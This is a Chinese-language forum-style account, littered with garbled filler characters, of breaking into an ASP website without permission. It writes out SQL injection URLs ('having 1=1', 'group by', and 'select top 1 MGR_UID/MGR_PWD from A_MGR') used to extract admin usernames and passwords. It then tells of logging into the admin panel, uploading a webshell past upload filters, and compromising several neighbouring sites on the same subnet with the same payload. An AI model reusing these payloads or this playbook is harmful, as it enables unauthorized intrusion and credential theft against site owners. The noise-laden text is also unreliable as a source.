发现一个注入点
4 I! d. I- q/ e E dhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
& m! ~- R. k2 B" D3 [4 G5 b+ T2 p( g7 L% p
习惯性的加’having1=1--
$ A3 V4 x) y# \' w. ^! S/ r/ }7 J: ]" L8 x5 i. B
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
8 u2 K% E; b; Y1 ?) t
# M) O1 D8 [6 B2 M: x0
8 f6 F; ^( @1 B2 R7 g6 p( g* } x; a3 t5 a, q. C% l7 e, i; ^
爆出Diary_A.dl_Title(这时候很激动啊)
& \4 [( f; {" u9 n6 ?" [6 S6 C* M6 p. \. O! |- {1 J
那么继续( T) {$ P2 ]. t/ R/ j
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
3 f R) a$ n& [, z9 O: ?- I' l: l3 g; N N9 n
继续,一直爆下去
$ J/ a3 ^# p2 H# y: t# c% A) r6 O% R. T# X. m/ U* b
爆到几个字段和表段 但是没找到需要的管理用户的字段 B$ [8 E! k/ v" S2 P# ]* [
0 H- o1 N) [, e: m+ U6 [蛋疼了 怎么办 然后去后台登陆页看源码( a# S5 R8 }1 P# I
( W: _- N6 |0 a/ S+ \8 ?* Y00 @, V& t' m, ]1 G; j, `6 ]. P- h
0 M1 F& @4 K3 E0 v$ \
Input name= “ADUID”
6 i; \+ _4 H$ s3 A" B/ `/ jInput name= “ADPWD”
V+ K# q: _8 |8 n/ U, R$ F7 t# ^: P8 E1 O
很幸运 找到了字段那就继续
" q/ l# d! |1 U: Z找到之后开始爆用户+ J5 z- k3 b; ^" l
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
! j9 w4 Y# r5 L4 p爆密码
+ ?" ~: ?: G2 y6 u4 ehttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—' z3 u& H9 j/ t, y- ]1 v" Z! m" B
测试了下 这个注入点只能爆到文章哪里的表
+ W$ Y/ F) a. ^: m4 n
* ` p' f A. v1 w+ V z- C7 X# v头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
9 P W5 K4 z9 q4 O' I
5 \/ m5 w8 Z# m5 O- ?8 [又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了9 H% i# F1 r Z/ V# `, ]+ T7 y
% x/ C! D& o, \+ k- ~473
- C2 @2 f+ J' e( [6 R. M/ p% P
' a4 E# a, t+ y" K进后台
' o2 Q& n* F( N4 B1 d2 a6 c- D& ]! c& I! H
/ O. O. J- t$ h7 t5 H! Y
发现几个上传点 有的地方不能上传 而且防止恶意代码( D2 y9 R2 f8 u* x) E* i
# T: i+ L, a4 j T
没办法 各种百度各种找大牛 找到一只好像可以突破的马
: n2 W0 t7 T2 c c G) k0 l! [' Q+ m9 E5 s! g! k% w( V( K
0 U0 Y- b8 r! x' }2 B在系统管理那里直接上传 不过没有显示地址
5 G8 {$ V# U- H' m' D; p( ]1 M4 H1 \: u- k1 C( V
再上传一次 抓包 搞定OK
' q8 F9 @# s( c2 ]; @" }2 @
+ d, m& K3 E8 L1 ?+ Y% g
1 C$ m( l H0 Q2 m/ w, T! ?$ }9 ~# n1 n: P4 [& v
4726 [; D+ s- i$ l1 l
7 E% j' R3 p# o+ G晚上不行了 去睡觉。。。0 m7 p$ E" w3 \; h+ }1 o) z
第二天刚起床 闲的没事做继续日站吧 - b- j3 J0 c$ i+ _( N9 N
" R) \. ]7 m+ g1 B. W找个站 就把这个站的旁c扫了下% c% W* y2 G$ g I
& T; Q! X( h4 ], L8 {" d发现c段也有一个购物站 ,然后还和这个站的模板差不多; w. ] p/ k+ A, ^, ?, |1 b) o6 I K
$ C; ]/ Q% S- M; S
就找到会员登录口测试0 ^# ^, o. k( X" W! z/ R* T8 N9 F9 {
7 N2 H# @1 p& t) p( A) K4 P* k
'and (select top 1 MGR_UID from A_MGR)>0—
; b4 _( H- G+ x" x+ C果断爆到了 这时候我很激动 通杀* g8 M+ x* z$ J4 r+ {
/ ?/ u7 _7 t6 o5 @
再次翻c段& g1 z- M# K" j1 o0 b! ?; ?
! D2 k6 q) v8 l0 C/ k
翻出几个站 都成功拿下% O, |8 A5 _$ v5 ^+ k2 g
) u) g T# o/ U$ _, k8 g- X {; y' k% x
# S# @% B L. v! z5 e5 \; p
修复方案:
+ J- [( Y0 P: f8 x! o5 t* S& j他们比我专业
3 X; K8 X X( b* s' \- G% V# s) K+ ?5 B: Q# h* S
5 g; T, Z9 Q( `8 F
8 u, h2 n, W! d B0 c
|